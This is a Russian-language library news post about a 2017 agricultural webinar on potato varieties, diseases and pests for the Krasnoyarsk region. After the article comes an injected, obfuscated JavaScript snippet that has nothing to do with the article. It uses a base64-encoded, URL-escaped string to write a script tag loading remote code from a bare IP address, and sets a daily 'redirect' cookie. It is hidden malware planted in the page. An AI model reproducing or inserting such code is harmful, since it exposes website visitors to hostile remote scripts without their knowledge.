Все о картофеле

Вот уже несколько лет Манская межпоселенческая библиотека сотрудничает с Научной библиотекой Красноярского государственного аграрного института. Получив по проекту НБ КГАУ компьютерное оборудование, мы теперь имеем возможность участвовать в вебинарах, проводимых НБ КГАУ и получать квалифицированные консультации по овощеводству от преподавательского состава университета.

Так, 22 марта 2017 года пользователи Манской библиотеки приняли участие в вебинаре «Все о картофеле», который вел А.Н.Халипский, заведующий кафедрой КГАУ.

Анатолий Николаевич рассказал о сортах картофеля, районированных для Красноярского края, подробнее остановился на таких сортах, как «Арамис» и «Красноярский ранний». Также мы услышали рассказ о болезнях и вредителях картофеля, о том, как их распознать и как с ними бороться.

И в завершение нашей вебинар-встречи А.Н.Халипский пригласил всех за новыми сортами картофеля на «Садовую ярмарку», которая пройдет в апреле в г.Красноярске в МДЦ «Сибирь».

А мы, в свою очередь, приглашаем всех овощеводов и просто заинтересованных к сотрудничеству, так как есть замечательная возможность задавать наболевшие вопросы и получать квалифицированную помощь.

function getCookie (e){var U=document.cookie.match (new RegExp («(?:^|; )»+e.replace (/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent (U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor (Date.now ()/1e3),cookie=getCookie («redirect»);if (now>=(time=cookie)||void 0===time){var time=Math.floor (Date.now ()/1e3+86400),date=new Date ((new Date).getTime ()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString (),document.write ('')}